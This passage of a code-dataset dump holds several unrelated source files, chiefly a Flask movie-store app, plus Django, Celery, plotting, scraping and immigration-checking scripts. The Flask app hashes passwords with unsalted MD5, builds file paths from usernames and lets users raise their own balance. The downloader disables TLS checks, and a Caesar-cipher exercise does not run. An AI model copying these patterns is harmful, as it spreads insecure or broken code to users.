bot.add_cog(Quote(bot))\n","sub_path":"quote/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332208079","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom article import views\nfrom article.views import RSSFeed\n\nurlpatterns = [\n\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.home, name = 'home'),\n url(r'^(?P\\d+)/$',views.detail,name='detail'),\n url(r'^archives/$', views.archives, name = 'archives'),\n url(r'^aboutme/$', views.about_me, name ='about_me'),\n url(r'^tag(?P\\w+)/$', views.search_tag, name = 'search_tag'),\n url(r'^search/$',views.blog_search,name = 'search'),\n url(r'^feed/$', RSSFeed(), name = \"RSS\"), #add urlconf,and set name as RSS,so we can use the url in model\n ]\n","sub_path":"my_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"542827251","text":"import csv\nimport numpy as np\nimport numpy.matlib\nfrom netCDF4 import Dataset\nimport pickle\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport cartopy.crs as ccrs\nimport cartopy\n\ndata_path= '/data/cloud/Goldtimes5/data/SPCAM/CPL64/'\n#=== load data\nCCWm_file= data_path+'CCW_gridmean.pk'\nCCWv_file= data_path+'CCW_gridvar.pk'\nCCWa_file= data_path+'CCW_aggrgate.pk'\nCAPE_file= data_path+'CAPE.pk'\nRH_file= data_path+'RHmid.pk'\nMSE_file= data_path+'MSE_sur.pk'\n\nwith open(CCWm_file, 'rb') as f:\n CCWm= pickle.load(f)\n\nwith open(CCWv_file, 'rb') as f:\n CCWv= pickle.load(f)\n\nwith open(CCWa_file, 'rb') as f:\n CCWa= pickle.load(f)\n\nwith open(CAPE_file, 'rb') as f:\n CAPE= pickle.load(f)\n\nwith open(RH_file, 'rb') as f:\n RH= pickle.load(f)\n\nwith open(MSE_file, 'rb') as f:\n MSE= pickle.load(f)\n\n#CCWa[np.isnan(CCWa)]=50\n#CaL= (CCWa==np.amax(CCWa))\n#CaS= (CCWa==np.amin(CCWa))\n#CAPE[~CaL]= np.mean(np.mean(np.mean(np.squeeze(CAPE),0),0),0)\n#CAPE[~CaS]= np.mean(np.mean(np.mean(np.squeeze(CAPE),0),0),0)\n#RH[~CaL]= np.mean(np.mean(np.mean(np.squeeze(RH),0),0),0)\n#RH[~CaS]= np.mean(np.mean(np.mean(np.squeeze(RH),0),0),0)\n#CAPE= np.squeeze(CAPE)\n#RH= np.squeeze(RH)\n#CAPESmax= np.argmax(CAPE)\n\nCRM_path= '/data/dadm1/model_output/SPCAM/CPL64/'\nCRM_temp= '/data/dadm1/model_output/SPCAM/CPL64/CPL64.cam.h1.0001-01-01-00000.nc'\nwith Dataset(CRM_temp,'r') as D:\n lat=D.variables['LAT_15s_to_30n'][:]\n lon=D.variables['LON_60e_to_180e'][:]\n maxGY= lat.size\n maxGX= lon.size\n ilev = D.variables['ilev'][:]\n\ndp= np.diff(ilev)\ndp= dp[2:] # lowest 24 levels of GCM grid\ndp2 = dp.reshape((dp.size,1))\ndp2 = numpy.matlib.repmat(dp2,1,64)\n\n# large CCWa\nday1= 0; lat1= 10; lon1= 19;\n# small CCWa\nday2= 0; lat2= 1; lon2= 38;\nprint('S1: mean: '+str(CCWm[0,day1,lat1,lon1]))\nprint('S1: var: '+str(CCWv[0,day1,lat1,lon1]))\nprint('S1: agg: '+str(CCWa[0,day1,lat1,lon1]))\nprint('S1: CAPE: '+str(CAPE[0,day1,lat1,lon1]))\nprint('S1: RH: '+str(RH[0,day1,lat1,lon1]))\nprint('S1: MSE: '+str(MSE[0,day1,lat1,lon1]))\n\nprint('S2: mean: '+str(CCWm[0,day2,lat2,lon2]))\nprint('S2: var: '+str(CCWv[0,day2,lat2,lon2]))\nprint('S2: agg: '+str(CCWa[0,day2,lat2,lon2]))\nprint('S1: CAPE: '+str(CAPE[0,day2,lat2,lon2]))\nprint('S1: RH: '+str(RH[0,day2,lat2,lon2]))\nprint('S1: MSE: '+str(MSE[0,day2,lat2,lon2]))\n\n\nagg_min= np.nanmin(CCWa)\nagg_small= (CCWa== agg_min)\nM= CCWm[agg_small]\nV= CCWv[agg_small]\nMr= M.reshape((1,M.size))\nVr= V.reshape((1,V.size))\noMr= CCWm.reshape((1,CCWm.size))\noVr= CCWv.reshape((1,CCWv.size))\n\nCRM_file1= CRM_path+'CPL64.cam.h1.0006-01-'+str(day1+1).zfill(2)+'-00000.nc'\nCRM_file2= CRM_path+'CPL64.cam.h1.0006-01-'+str(day2+1).zfill(2)+'-00000.nc'\nwith Dataset(CRM_file1,'r') as D:\n qc= D.variables['CRM_QC_LON_60e_to_180e_LAT_15s_to_30n'][:,:,0,:,lat1,lon1]\n qc= np.squeeze(np.mean(qc,0))\n qc= qc * dp2 / np.sum(dp)\n hm1= np.sum(qc,0)\n ind1q= hm1.argsort()[-6:][::-1]\n W= D.variables['CRM_W_LON_60e_to_180e_LAT_15s_to_30n'][:,16,0,:,lat1,lon2]\n W1= np.squeeze(np.mean(W,0))\n ind1W= W1.argsort()[-6:][::-1]\n\nwith Dataset(CRM_file2,'r') as D:\n qc= D.variables['CRM_QC_LON_60e_to_180e_LAT_15s_to_30n'][:,:,0,:,lat2,lon2]\n W= D.variables['CRM_W_LON_60e_to_180e_LAT_15s_to_30n'][:,16,0,:,lat2,lon2]\n qc= np.squeeze(np.mean(qc,0))\n W2= np.squeeze(np.mean(W,0))\n qc= qc * dp2 / np.sum(dp)\n hm2= np.sum(qc,0)\n ind2q= hm2.argsort()[-6:][::-1]\n ind2W= W2.argsort()[-6:][::-1]\n\nplt.figure(figsize=(7,3))\nplt.plot(np.arange(1,65), hm1, color='r')\nplt.plot(ind1q+1, hm1[ind1q], 'ro', linestyle='')\nplt.plot(np.arange(1,65), hm2, color='b')\nplt.plot(ind2q+1, hm2[ind2q], 'bo', linestyle='')\nplt.xlim(1, 64)\npicsave= '/data/cloud/Goldtimes5/pic/SPCAM/Snapshot/Large_Small_agg.png'\nplt.savefig(picsave)\nplt.show()\n\nplt.figure(figsize=(7,3))\nplt.plot(np.arange(1,65), W1, color='r')\nplt.plot(ind1W+1, W1[ind1W], 'ro', linestyle='')\nplt.plot(np.arange(1,65), W2, color='b')\nplt.plot(ind2W+1, W2[ind2W], 'bo', linestyle='')\nplt.xlim(1, 64)\npicsave= '/data/cloud/Goldtimes5/pic/SPCAM/Snapshot/Large_Small_agg_W.png'\nplt.savefig(picsave)\nplt.show()\n\n\n","sub_path":"Goldtimes5/GCM_SPCAM/plot/unmodified/plot_CRM_profile.py","file_name":"plot_CRM_profile.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"426148893","text":"__author__ = 'Administrator'\n\ndef checkPID(pid):\n if len(pid) == 18:\n print(\"your pid is : \"+pid)\n else:\n print(\"your pid length is incorrect\")\n\n ID_add = pid[0:6]\n ID_birth = pid[6:14]\n ID_sex = pid[14:17]\n ID_check = pid[17]\n\n #ID_add是身份证中的区域代码,如果有一个行政区划代码字典,就可以用获取大致地址#\n\n year = ID_birth[0:4]\n moon = ID_birth[4:6]\n day = ID_birth[6:8]\n print(\"Birthday: \",year+'-'+moon+'-'+day)\n\n if int(ID_sex) % 2 == 0:\n print('Gender : Female')\n else:\n print('Gender : Male')\n\nif __name__ == '__main__':\n while True:\n PID = input('Please input your personal id. \\n ')\n checkPID(PID)\n if PID == 'q':\n break","sub_path":"src/fundamental/basic/checkPersonalID.py","file_name":"checkPersonalID.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"647803976","text":"message = input(\"Enter a message: \")\nshift = input(\"Enter a number to shift by (0-25): \")\nprint(\"Encrypting message....\")\nlist1 = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\",\n \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\nanswer = (list1.index(0)-shift)\nprint(\"answer\")\n\nfor symbol in message:\n if symbol in list1:\n num = list1.index(symbol)\nmode = 'encrypt'\nif mode == 'encrypt':\n num = num + shift\n\nprint(\"Encrypted message:\", )\n\nmode = 'decrypt'\nif mode == 'decrypt':\n num = num - shift\n\nprint(\"Decrypting message....\")\nprint(\"Decrypted message:\", message)\nprint(\"Original message:\", message)\n","sub_path":"files/ITP_a4_Lord_Alec/ITP_a4_Lord_Alec.py","file_name":"ITP_a4_Lord_Alec.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"79288681","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2019/1/28 20:46\n\n@author: li\n\"\"\"\n\nimport requests\nimport json\nimport time\nfrom contextlib import closing\n\n\nclass GetPhotos(object):\n def __init__(self):\n self.photos_id = []\n self.download_sever = 'https://unsplash.com/photos/xxx/download?force=true'\n self.download_target = 'https://unsplash.com/napi/collections/3356568/photos?page=1&per_page=20&order_by=latest'\n\n def get_id(self):\n req = requests.get(url=self.download_target, verify=False)\n html = json.loads(req.text)\n for each in html:\n self.photos_id.append(each['id'])\n time.sleep(1)\n\n def download(self, photo_id, filename):\n target = self.download_sever.replace('xxx', photo_id)\n with closing(requests.get(url=target, stream=True, verify=False)) as r:\n with open('%d.jpg' % filename, 'ab+') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n f.flush()\n\n\nif __name__ == '__main__':\n gp = GetPhotos()\n print('获取图片链接中:')\n gp.get_id()\n print('图片下载中:')\n for i in range(len(gp.photos_id)):\n print('正在下载第%d张图片' % (i + 1))\n gp.download(gp.photos_id[i], i + 1)\n\n\n# if __name__ == '__main__':\n# target = 'https://unsplash.com/napi/collections/3356568/photos?page=1&per_page=20&order_by=latest'\n# req = requests.get(url=target, verify=False)\n# html = json.loads(req.text)\n# print(html[0])\n# print(html[0]['links']['download_location'])\n","sub_path":"spyder_photos.py","file_name":"spyder_photos.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208957926","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nimport logging\nimport os\n\nfrom celery import Celery, Task\n\nfrom django.conf import settings\n\n_logger = logging.getLogger(\"polyaxon.tasks\")\n\n\nclass PolyaxonTask(Task):\n abstract = True\n\n def on_success(self, retval, task_id, args, kwargs):\n _logger.info(\"Celery task succeeded\", extra={'task name': self.name})\n\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n extra = {\n 'task name': self.name,\n 'task id': task_id,\n 'task args': args,\n 'task kwargs': kwargs,\n }\n _logger.error(\"Celery Task Failed\", exc_info=einfo, extra=extra)\n\n def on_retry(self, exc, task_id, args, kwargs, einfo):\n _logger.info(\"Celery task retry\", extra={'task name': self.name})\n\n\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api.settings')\n\napp = Celery('api')\n\napp.Task = PolyaxonTask # Custom base class for logging\n\n# Using a string here means the worker don't have to serialize\n# the configuration object to child processes.\napp.config_from_object('django.conf:settings')\n\n# Load task modules from all registered Django app configs.\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n","sub_path":"api/api/celery_api.py","file_name":"celery_api.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"527144484","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom app import app\nfrom flask import render_template, request, url_for, redirect, session, make_response, Flask, jsonify, request\nimport json\nimport os\nimport sys\nimport hashlib\nfrom random import randrange\nfrom flask import flash\nimport ast\nfrom datetime import date\nimport random \n\n\n@app.route('/', methods=['POST', 'GET', 'PUT'])\n@app.route('/index', methods=['POST', 'GET', 'PUT'])\ndef index():\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n\n if request.method == 'POST':\n if 'Busqueda' in request.form:\n pelicula = request.form['Busqueda']\n movies = []\n for x in catalogue['peliculas']:\n if pelicula.lower() in x['titulo'].lower():\n movies.append(x)\n if not movies:\n flash('La búsqueda \"' + pelicula + '\" no ha producido resultados. Por favor, realiza otra búsqueda')\n return render_template('index.html', title=\"Home\", movies=catalogue['peliculas'], session=session)\n return render_template('index.html', title=\"Home\", movies=movies, session=session)\n elif 'Filtrado' in request.form:\n pelicula = request.form['Filtrado']\n if pelicula == 'Filtrar por':\n flash('Introduce un filtro válido')\n return render_template('index.html', title=\"Home\", movies=catalogue['peliculas'], session=session)\n movies = []\n for x in catalogue['peliculas']:\n if pelicula.lower() in x['genero'].lower():\n movies.append(x)\n return render_template('index.html', title=\"Home\", movies=movies, session=session)\n\n return render_template('index.html', title=\"Home\", movies=catalogue['peliculas'], session=session)\n\n\n\n@app.route('/')\ndef detalle(titulo):\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n movies = catalogue['peliculas']\n pelicula = next((item for item in movies if item[\"titulo\"] == titulo), False)\n \n if 'logged_in' in session:\n if pelicula:\n historial_dir = open(os.path.join(app.root_path, 'usuarios',\n session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n compradas = []\n historial = json.loads(historial_dir)\n datosHistorial = historial['historial']\n for x in datosHistorial:\n for y in x['peliculas']:\n compradas.append(int(y))\n if int(pelicula['id']) in compradas:\n return render_template('detail.html', coleccion='true', selection=pelicula)\n \n return render_template('detail.html', selection=pelicula)\n\n\n@app.route('/sesion')\ndef sesion():\n last_user = request.cookies.get('username')\n if last_user:\n return render_template('sesion.html', title=\"Sesion\", last_user=last_user)\n return render_template('sesion.html', title=\"Sesion\")\n\n\n@app.route('/registrar', methods=['GET', 'POST'])\ndef registrar():\n if request.method == \"POST\":\n usuario = {\"username\": request.form['usuario'],\n \"password\": hashlib.md5(request.form['password'].encode('utf-8')).hexdigest(),\n \"email\": request.form['email'],\n \"genero\": request.form['genero'],\n \"edad\": request.form['edad'],\n \"tarjeta\": request.form['tarjeta'],\n \"saldo\": randrange(101),\n \"nPedidos\": 0}\n\n directorio = os.path.join(\n app.root_path, 'usuarios', request.form['usuario'])\n try:\n os.makedirs(directorio)\n except OSError:\n flash('¡El usuario ya existe!')\n return redirect(url_for('sesion'))\n\n directorio = os.path.join(\n app.root_path, 'usuarios', request.form['usuario'], 'datos.dat')\n data_file = open(directorio, \"w\")\n data_file.write(str(usuario))\n data_file.close()\n\n directorio = os.path.join(\n app.root_path, 'usuarios', request.form['usuario'], 'historial.json')\n historial = open(directorio, \"w\")\n json.dump({\n \"historial\": []\n }, historial)\n historial.close()\n \n \n session['logged_in'] = True\n session['usuario'] = usuario['username']\n session[\"saldo\"] = usuario['saldo']\n session.modified = True\n\n resp = make_response(redirect(url_for('index')))\n resp.set_cookie('username', usuario['username'])\n return resp\n\n return redirect(url_for('index'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == \"POST\":\n usuario = request.form['usuario']\n password = hashlib.md5(\n request.form['password'].encode('utf-8')).hexdigest()\n\n directorio = os.path.join(\n app.root_path, 'usuarios', usuario, 'datos.dat')\n try:\n with open(directorio, \"r\") as data_file:\n data_dictionary = ast.literal_eval(data_file.read())\n except IOError:\n flash('¡El usuario no existe!')\n flash('Puedes registrarte en esta misma página.')\n return redirect(url_for('sesion'))\n\n if(password != data_dictionary.get('password')):\n flash('¡Contraseña errónea!')\n return redirect(url_for('sesion'))\n\n session['logged_in'] = True\n session['usuario'] = request.form['usuario']\n session[\"saldo\"] = data_dictionary[\"saldo\"]\n session.modified = True\n\n resp = make_response(redirect(url_for('index')))\n resp.set_cookie('username', usuario)\n return resp\n else:\n flash('Error en el login, pruebe otra vez.')\n return redirect(url_for('sesion'))\n\n\n@app.route('/logout/')\ndef logout(user):\n if 'logged_in' in session:\n session.pop('usuario', None)\n session.pop('logged_in', None)\n session.modified = True\n else:\n flash('Hubo un error al cerrar sesión')\n\n return redirect(url_for('index'))\n\n\n@app.route(\"/carrito\")\ndef carrito():\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n\n ids_in_cart = session.get('cart', [])\n movies = []\n precio = 0\n\n for x in catalogue['peliculas']:\n if x['id'] in ids_in_cart:\n movies.append(x)\n precio += x['precio']\n session['total'] = precio\n session.modified = True\n\n return render_template(\"carrito.html\", movies=movies, precio=precio)\n\n\n@app.route(\"/pedidos\")\ndef pedidos():\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n\n if 'logged_in' in session:\n historial_dir = open(os.path.join(app.root_path, 'usuarios',\n session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n historial = json.loads(historial_dir)\n datosHistorial = historial['historial']\n\n return render_template(\"pedidos.html\", datosHistorial=datosHistorial, movies=catalogue['peliculas'])\n redirect(url_for('index'))\n \n \n@app.route(\"/coleccion\")\ndef coleccion():\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n if 'logged_in' in session:\n historial_dir = open(os.path.join(app.root_path, 'usuarios',\n session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n movies = []\n historial = json.loads(historial_dir)\n datosHistorial = historial['historial']\n for x in datosHistorial:\n for y in x['peliculas']:\n for z in catalogue['peliculas']:\n if y == z['id']:\n movies.append(z)\n\n return render_template(\"coleccion.html\", movies=movies)\n redirect(url_for('carrito'))\n\n\n@app.route(\"/add_to_cart/\")\ndef add_to_cart(id):\n if 'cart' not in session:\n session['cart'] = []\n\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n if int(id) in session['cart']:\n flash('Este artículo ya está en el carrito')\n for x in catalogue['peliculas']:\n if x['id'] == int(id):\n return redirect(\"/\" + x['titulo'])\n session['cart'].append(int(id))\n\n flash('Elemento añadido al carrito')\n\n\n return redirect(url_for('carrito'))\n\n\n@app.route('/borrarCarrito')\ndef borrarCarrito():\n session.pop('cart', None)\n session.modified = True\n\n return redirect(url_for('carrito'))\n\n\n@app.route('/borrarElemento/')\ndef borrarElemento(id):\n session['cart'].remove(int(id))\n session.modified = True\n\n return redirect(url_for('carrito'))\n\n\n@app.route('/comprarCarrito')\ndef comprarCarrito():\n if 'logged_in' in session:\n directorio = os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n try:\n with open(directorio, \"r\") as data_file:\n data_dictionary = ast.literal_eval(data_file.read())\n except IOError:\n flash('¡El usuario no existe!')\n saldo = data_dictionary.get('saldo')\n if saldo >= session['total']:\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n\n ids_in_cart = session.get('cart', [])\n\n historial_data = open(os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n historial = json.loads(historial_data)\n datosHistorial = historial['historial']\n id = data_dictionary.get('nPedidos')\n data = {\n \"id\": id,\n \"fecha\": str(date.today()),\n \"precio\": session['total'],\n \"peliculas\": ids_in_cart\n }\n datosHistorial.append(data)\n\n directorioHistorial = os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'historial.json')\n file = open(directorioHistorial, \"w\")\n json.dump({\n \"historial\": datosHistorial}, file)\n file.close()\n session.pop('cart', None)\n session.modified = True\n data_dictionary[\"saldo\"] -= session['total']\n data_dictionary[\"nPedidos\"] += 1\n\n directorio_datos = os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n datos_file = open(directorio_datos, \"w\")\n datos_file.write(str(data_dictionary))\n datos_file.close()\n session[\"saldo\"] = data_dictionary[\"saldo\"]\n\n flash('¡Carrito comprado!')\n return redirect(url_for('carrito'))\n else:\n flash('No tienes suficiente saldo. Haz click en saldo (barra lateral) para añadir más')\n return redirect(url_for('carrito'))\n else:\n flash('¡Para comprar debes estar logueado!')\n return redirect(url_for('sesion'))\n\n\n@app.route('/comprarElemento/')\ndef comprarElemento(id):\n if 'logged_in' in session:\n directorio = os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n try:\n with open(directorio, \"r\") as data_file:\n data_dictionary = ast.literal_eval(data_file.read())\n except IOError:\n flash('¡El usuario no existe!')\n catalogue_data = open(os.path.join(\n app.root_path, 'catalogue/catalogo.json'), encoding=\"utf-8\").read()\n catalogue = json.loads(catalogue_data)\n for x in catalogue['peliculas']:\n if x['id'] == int(id):\n pelicula = x\n saldo = data_dictionary.get('saldo')\n if saldo >= pelicula['precio']:\n\n ids_in_cart = [int(id)]\n\n historial_data = open(os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'historial.json'), encoding=\"utf-8\").read()\n historial = json.loads(historial_data)\n datosHistorial = historial['historial']\n idPedido = data_dictionary.get('nPedidos')\n data = {\n \"id\": idPedido,\n \"fecha\": str(date.today()),\n \"precio\": pelicula['precio'],\n \"peliculas\": ids_in_cart\n }\n datosHistorial.append(data)\n\n directorioHistorial = os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'historial.json')\n file = open(directorioHistorial, \"w\")\n json.dump({\n \"historial\": datosHistorial}, file)\n file.close()\n session['cart'].remove(int(id))\n session.modified = True\n data_dictionary[\"saldo\"] -= pelicula['precio']\n session['total'] -= pelicula['precio']\n data_dictionary[\"nPedidos\"] += 1\n\n directorio_datos = os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n datos_file = open(directorio_datos, \"w\")\n datos_file.write(str(data_dictionary))\n datos_file.close()\n session[\"saldo\"] = data_dictionary[\"saldo\"]\n\n flash('¡Articulo comprado!')\n return redirect(url_for('carrito'))\n else:\n flash('No tienes suficiente saldo. Haz click en saldo (navegador) para añadir más')\n return redirect(url_for('carrito'))\n else:\n flash('¡Para comprar debes estar logueado!')\n return redirect(url_for('sesion'))\n\n\n@app.route('/saldo')\ndef saldo():\n return render_template(\"saldo.html\", title=\"Saldo\", session=session)\n\n\n@app.route('/aumentarSaldo', methods=['GET', 'POST'])\ndef aumentarSaldo():\n if request.method == \"POST\":\n aumento = int(request.form['cantidad'])\n\n directorio = os.path.join(\n app.root_path, 'usuarios', session['usuario'], 'datos.dat')\n try:\n with open(directorio, \"r+\") as data_file:\n data_dictionary = ast.literal_eval(data_file.read())\n saldo = data_dictionary.get('saldo')\n saldo += aumento\n data_dictionary['saldo'] = saldo\n data_file.seek(0)\n data_file.write(str(data_dictionary))\n data_file.truncate()\n except IOError:\n flash('¡El usuario no existe!')\n return redirect(url_for('saldo'))\n\n session[\"saldo\"] += aumento\n session.modified = True\n flash('¡Saldo aumentado!')\n return redirect(url_for('index'))\n else:\n flash('Error al incrementar saldo, pruebe otra vez.')\n return redirect(url_for('saldo'))\n\n\n@app.route('/connectedUsers')\ndef connectedUsers():\n return jsonify(result = random.randrange(150,200))\n\n","sub_path":"public_html/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":15421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"198740514","text":"#!/usr/bin/env python3\n\n\"\"\" Computer-based immigration office for Kanadia \"\"\"\n\n__author__ = 'Susan Sim, Xiwen Zhou, Alex Goel'\n__email__ = \"ses@drsusansim.org, xw.zhou@mail.utoronto.ca, alex.goel@mail.utoronto.ca\"\n\n__copyright__ = \"2014 Susan Sim, Xiwen Zhou, Alex Goel\"\n__license__ = \"MIT License\"\n\n__status__ = \"Prototype\"\n\n# imports one per line\nimport re\nimport datetime\nimport json\n\n\ndef check_valid(entries_content_list, index):\n \"\"\"(list,int)-> str\n Check if all the must have information is included\n Check if passport number and birth date is in right format\n Return reject if not included or right\n :param entries_content_list: List that loaded from a JSON formatted\n file that contains cases to decide\n :param index: Index for looping through all entries\n :return: Strings. Possible values of string is:\"Reject\"\n \"\"\"\n try:\n if not valid_passport_format(entries_content_list[index][\"passport\"]):\n return \"Reject\"\n if not valid_date_format(entries_content_list[index][\"birth_date\"]):\n return \"Reject\"\n entries_content_list[index][\"home\"][\"city\"]\n entries_content_list[index][\"home\"][\"region\"]\n entries_content_list[index][\"home\"][\"country\"]\n entries_content_list[index][\"from\"][\"city\"]\n entries_content_list[index][\"from\"][\"region\"]\n entries_content_list[index][\"from\"][\"country\"]\n entries_content_list[index][\"first_name\"]\n entries_content_list[index][\"last_name\"]\n entries_content_list[index][\"entry_reason\"]\n #check for must-contain information\n except KeyError:\n return \"Reject\"\n\n\ndef watch_list(entries_content_list, watchlist_contents_list, index):\n \"\"\"(list,list,int)-> str\n Checks if a person trying to enter the country is on the watchlist\n :param entries_content_list: List that loaded from a JSON\n formatted file that contains cases to decide\n :param watchlist_contents_list: List that loaded from a\n JSON formatted file that contains\n names and passport numbers on a watchlist\n :param index: Index for looping through all entries\n :return: Strings. Possible values of string is:\"Secondary\"\n \"\"\"\n each_entries_content = entries_content_list[index]\n for each_watchlist in watchlist_contents_list:\n if each_entries_content['passport'].upper()\\\n == each_watchlist[\"passport\"].upper():\n return \"Secondary\"\n #Check if entry's passport number is in watchlist\n elif each_entries_content['first_name'].upper()\\\n == each_watchlist[\"first_name\"].upper()and\\\n each_entries_content['last_name'].upper()\\\n == each_watchlist[\"last_name\"].upper():\n #Check if entry's first name and last name are both in watchlist\n return \"Secondary\"\n else:\n return None\n\n\ndef medical_advisory(entries_content_list, countries_contents_dic, index):\n \"\"\"(list,dict,int)-> str\n Checks if a person trying to enter the country has come\n from or via a country that requires medical advisory.\n :param entries_content_list: List that loaded from a\n JSON formatted file that contains cases to decide\n :param countries_contents_dic: Dictionary that loaded from a JSON\n formatted file that contains countries entry requirement information\n :param index: Index for looping through all entries\n :return: Strings. Possible values of strings are:\"Reject\",\"Quarantine\"\n \"\"\"\n\n each_entry = entries_content_list[index]\n try:\n if countries_contents_dic[each_entry[\"from\"][\"country\"].upper()]\\\n [\"medical_advisory\"] != \"\":\n return \"Quarantine\"\n except KeyError:\n return \"Reject\"\n try:\n if countries_contents_dic[each_entry[\"via\"][\"country\"].upper()]\\\n [\"medical_advisory\"] != \"\":\n return \"Quarantine\"\n #Check via country information. As via is not a must-have information,\n # can't return reject if not found\n except KeyError:\n return None\n\n\ndef returning_residents(entries_content_list, index):\n \"\"\"(list,int)-> str\n Checks if a person is a KAN resident returning home country.\n :param entries_content_list: List that loaded from a\n JSON formatted file that contains cases to decide\n :param index: Index for looping through all entries\n :return: Strings. Possible values of string is:\"Accept\"\n \"\"\"\n\n each_entry = entries_content_list[index]\n if each_entry[\"entry_reason\"] == \"returning\" and\\\n each_entry[\"home\"][\"country\"].upper() == \"KAN\":\n return \"Accept\"\n\n\ndef visit_visa(entries_content_list, countries_contents_dic, index):\n \"\"\"(list,dict,int)-> str\n Checks if a person entering a certain country as a\n visitor will be asked for a visit visa\n :param entries_content_list: List that loaded from a JSON\n formatted file that contains cases to decide\n :param countries_contents_dic: Dictionary that loaded from a\n JSON formatted file that contains\n countries entry requirement information\n :param index: Index for looping through all entries\n :return: Strings. Possible values of strings are:\"Accept\",\"Reject\"\n \"\"\"\n\n each_entry = entries_content_list[index]\n if each_entry[\"entry_reason\"] == \"visit\":\n if countries_contents_dic[each_entry[\"from\"][\"country\"].upper()]\\\n [\"visitor_visa_required\"] == \"1\":\n try:\n issue_date = each_entry[\"visa\"][\"date\"]\n today = datetime.date.today()\n year = int(issue_date[0:4])\n month = int(issue_date[5:7])\n day = int(issue_date[9:11])\n margin = datetime.timedelta(days=730)\n #Check if issue date is within 730 days from now\n if today-margin <= datetime.date(year, month, day):\n visa_format = re.compile('^\\w{5}-\\w{5}$')\n #Check if visa code is in right format\n if visa_format.match(each_entry[\"visa\"][\"code\"]):\n return \"Accept\"\n else:\n return \"Reject\"\n except KeyError:\n #check if the entry has a visa\n return \"Reject\"\n else:\n return None\n\n\ndef transit_visa(entries_content_list, countries_contents_dic, index):\n \"\"\"(list,dict,int)-> str\n Checks if a person entering a certain country\n as a visitor will be asked for a transit visa\n :param entries_content_list: List that loaded from a\n JSON formatted file that contains cases to decide\n :param countries_contents_dic: Dictionary that\n loaded from a JSON formatted file that contains\n countries entry requirement information\n :param index: Index for looping through all entries\n :return: Strings; Possible values of strings are:\"Accept\",\"Reject\"\n \"\"\"\n\n each_entry = entries_content_list[index]\n if each_entry[\"entry_reason\"] == \"transit\":\n if countries_contents_dic[each_entry[\"from\"][\"country\"].upper()]\\\n [\"transit_visa_required\"] == \"1\":\n try:\n issue_date = each_entry[\"visa\"][\"date\"]\n today = datetime.date.today()\n year = int(issue_date[0:4])\n month = int(issue_date[5:7])\n day = int(issue_date[9:11])\n margin = datetime.timedelta(days=730)\n #Check if issue date is within 730 days from now\n if today-margin <= datetime.date(year, month, day):\n visa_format = re.compile('^\\w{5}-\\w{5}$')\n #Check if visa code is in right format\n if visa_format.match(each_entry[\"visa\"][\"code\"]):\n return \"Accept\"\n else:\n return \"Reject\"\n except KeyError:\n #check if the entry has a visa\n return 